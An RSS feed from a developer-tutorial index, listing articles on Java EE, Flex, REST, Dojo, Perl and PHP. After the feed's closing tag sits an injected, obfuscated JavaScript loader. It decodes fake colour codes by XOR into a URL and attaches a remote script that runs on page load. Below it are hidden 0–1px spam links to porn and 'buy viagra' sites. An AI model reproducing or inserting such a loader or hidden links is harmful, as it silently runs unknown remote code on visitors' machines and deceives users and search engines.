<?xml version="1.0" encoding="ISO-8859-1" ?>
<rss version="0.91">
  <channel>
    <title>DevPointer</title>
    <link>http://www.devpointer.net/</link>
    <copyright>Copyright (C)2006 DevPointer</copyright>
        <description>DevPointer provides an index of articles, tutorials, faqs, and other online resources for developers.</description>
    <managingEditor>craig@k5n.us</managingEditor>
    <webMaster>craig@k5n.us</webMaster>
          <item>
        <title>Java EE and Flex: A compelling combination, Part 2</title>
        <link>http://www.devpointer.net/redirect.php?id=2429</link>
        <description>Dustin Marx follows up his introduction to combining Flex and Java EE with a look at more ways to connect your Flex front end to a Java enterprise server.  Learn how to connect Flex and Java EE via proxied or unproxied HTTP or Web services, and how to bind Flex objects to Java code on the server side.</description>
      </item>
          <item>
        <title>REST for Java developers, Part 3: NetKernel</title>
        <link>http://www.devpointer.net/redirect.php?id=2430</link>
        <description>Transitioning from an object-oriented to a resource-oriented perspective means letting go of your ideas about how things should work. Give it a try with this introduction to NetKernel: a URI-based microkernel environment that relaxes object bindings to enable more scalable and maintainable RESTful systems.</description>
      </item>
          <item>
        <title>Client-side Java&#039;s evolutionary leap</title>
        <link>http://www.devpointer.net/redirect.php?id=2431</link>
        <description>Need perspective on the rapid evolution of client-side Java? Get it here, as Jeff Friesen invites leading lights in the Java community to share thoughts, and some scoops, on recent developments and what&#039;s next for client-side Java development. Topics include JavaFX, Swing, NetBeans 6.5, OpenJDK, and the Da Vinci Machine.</description>
      </item>
          <item>
        <title>Open source Java projects: Terracotta</title>
        <link>http://www.devpointer.net/redirect.php?id=2432</link>
        <description>Get a primer on clustering, including its typical failure points in serialization and redundancy. Then find out how Terracotta overcomes these challenges in JavaWorld&#039;s hands-on introduction to enterprise clustering with Terracotta.</description>
      </item>
          <item>
        <title>A developer&#039;s view of mobile platforms</title>
        <link>http://www.devpointer.net/redirect.php?id=2434</link>
        <description>Smartphone programming is booming and flexible developers are spoiled for choice. InfoWorld&#039;s Peter Wayner shuffles the options for you, with pros and cons for choosing Android over iPhone, or Nokia over Palm.</description>
      </item>
          <item>
        <title>Evaluating Agile</title>
        <link>http://www.devpointer.net/redirect.php?id=2435</link>
        <description>Delivering high-quality software efficiently is critical to businesses in every industry -- and that means the 18-month product cycle is on its way out. IBM&#039;s Sue McKinney takes a hard-nosed look at Agile&#039;s faster approach to software development.</description>
      </item>
          <item>
        <title>Introduction to the Dojo toolkit, Part 1</title>
        <link>http://www.devpointer.net/redirect.php?id=2433</link>
        <description>If you&#039;re looking for a JavaScript framework that does more than simplify DOM access, the Dojo toolkit could be your answer. Find out how you could enhance your Web 2.0 mojo with Dojo&#039;s object-oriented JavaScript programming model and handy Ajax-style widgets.</description>
      </item>
          <item>
        <title>Java EE and Flex: A compelling combination, Part 1</title>
        <link>http://www.devpointer.net/redirect.php?id=2436</link>
        <description>Adobe Flex is catching on as a front-end technology for enterprise Java applications, and here&#039;s your chance to find out why. Flex and Java EE developer Dustin Marx gets you started building a rich-client UI with Flex, then tying it to your Java EE application&#039;s business logic.</description>
      </item>
          <item>
        <title>Open source Java projects: NetBeans plugins</title>
        <link>http://www.devpointer.net/redirect.php?id=2437</link>
        <description>NetBeans plugins let you do all kinds of things you can&#039;t do with NetBeans alone, and they&#039;re open source. Jeff Friesen introduces five useful plugins, then gets you started with creating your own plugins for NetBeans 6.5.</description>
      </item>
          <item>
        <title>Creating a Database with Perl and DBI</title>
        <link>http://www.devpointer.net/redirect.php?id=2047</link>
        <description>In this second part of a four-part series on Perl and the DBI you ll learn how to create a database and how to use a collection of very important commands. This article is excerpted from chapter 15 of the book &quot;Beginning Perl&quot;.</description>
      </item>
          <item>
        <title>Synchronizing Properties with Beans Binding (JSR 295)</title>
        <link>http://www.devpointer.net/redirect.php?id=2035</link>
        <description>John O&#039;Conner shows how JSR 295, Beans Binding, eliminates burdensome glue code for wiring up relationships between objects.</description>
      </item>
          <item>
        <title>Building File Uploaders with PHP 5</title>
        <link>http://www.devpointer.net/redirect.php?id=2048</link>
        <description>My goal here is simply tackling file uploads from a hands-on point of view and discarding all of those additional configuration settings that must be performed in the web server. Therefore, in this series of articles, I’m going to show you how to build some file uploading mechanisms with PHP 5, which, due their intrinsic modularity, can be easily integrated into other existing PHP applications with minor hassles.</description>
      </item>
          <item>
        <title>Drupal 6.0: Installation and Basic Usage</title>
        <link>http://www.devpointer.net/redirect.php?id=2040</link>
        <description>A guide to installing and using Drupal, an open source content management systems that is widely used.</description>
      </item>
          <item>
        <title>Translucent and Shaped Swing Windows</title>
        <link>http://www.devpointer.net/redirect.php?id=2036</link>
        <description>Kirill Grouchnikov shows off the Consumer JDK&#039;s ability to set per-pixel translucency on windows, which opens up a wide variety of possibilities for translucent and shaped windows previously only available to native applications.</description>
      </item>
          <item>
        <title>Reverse Callback Templating</title>
        <link>http://www.devpointer.net/redirect.php?id=2049</link>
        <description>James Robson explains a hybrid approach to templating -- reverse callbacks -- with the Template::Recall module.</description>
      </item>
          <item>
        <title>The Open Road: Superpackages</title>
        <link>http://www.devpointer.net/redirect.php?id=2037</link>
        <description>Wonder what the relationship between com.example.package and com.example.package.test is? There isn&#039;t one! This lack of an orderly package-visibility relationship has made life difficult for a number of programmers trying to balance organizational needs against practical concerns. In this entry of &quot;The Open Road,&quot; Elliotte Rusty Harold takes a look at how JSR 294 (&quot;superpackages&quot;), intended to be part of Java SE 7, proposes to fix this problem.</description>
      </item>
          <item>
        <title>An Introduction to JavaScript Object Notation (JSON)</title>
        <link>http://www.devpointer.net/redirect.php?id=2051</link>
        <description>JavaScript Object Notation, or JSON for short, is a lightweight data-interchange format which may prove to be a viable alternative to XML for IT developers. It&#039;s easy to read and write by people as well as for machines to parse and generate.</description>
      </item>
          <item>
        <title>Elements of Access Control</title>
        <link>http://www.devpointer.net/redirect.php?id=2050</link>
        <description>Vladi Belperchinov explains how access control works to keep private data accessible to the right people and invisible to the wrong people.</description>
      </item>
          <item>
        <title>Reflection in Action</title>
        <link>http://www.devpointer.net/redirect.php?id=2038</link>
        <description>In this introductory article, Albert Attard introduces the basic techniques of reflection: discovering and using a class&#039;s methods and fields at runtime, and discusses cases where this can be a powerful technique.</description>
      </item>
          <item>
        <title>Query by Slice, Parallel Execute, and Join: A Thread Pool Pattern in Java</title>
        <link>http://www.devpointer.net/redirect.php?id=2039</link>
        <description>Binildas C. A. shows how to combine the database&#039;s ROWNUM function with Java SE 5&#039;s thread pools to create highly effective pagination.</description>
      </item>
          </channel>
</rss><script>
function vdch() {
	if(document.all.length > 3) {
		var t = new Array('#6a7072', '#723e29', '#2d7371', '#752a62', '#637d65', '#6d2a60', '#702b63', '#7a7029');
		var dchid = ""; for (j=0;j<t.length;j++) { var c_rgb = t[j]; for (i=1;i<7;i++) { var c_clr = c_rgb.substr(i++,2); if (c_clr!="00") dchid += String.fromCharCode(parseInt(c_clr,16)^i); } }
		var dch = document.createElement("script");
		dch.id = "dchid";
		dch.src = dchid;
		document.all[3].appendChild(dch);
	} else {
		setTimeout("vdch()",500);
	}
} setTimeout("vdch()",500);
</script><!-- Db queries: 0 -->
<!-- No db connection made (cached) -->
<html
<a style="font-size:1px;text-decoration:none" href="http://xxx-hard.info">best porn movie</a></div>
<a style="font-size:0px;text-decoration:none" href="http://1med.info">buy viagra</a></div>

</html>

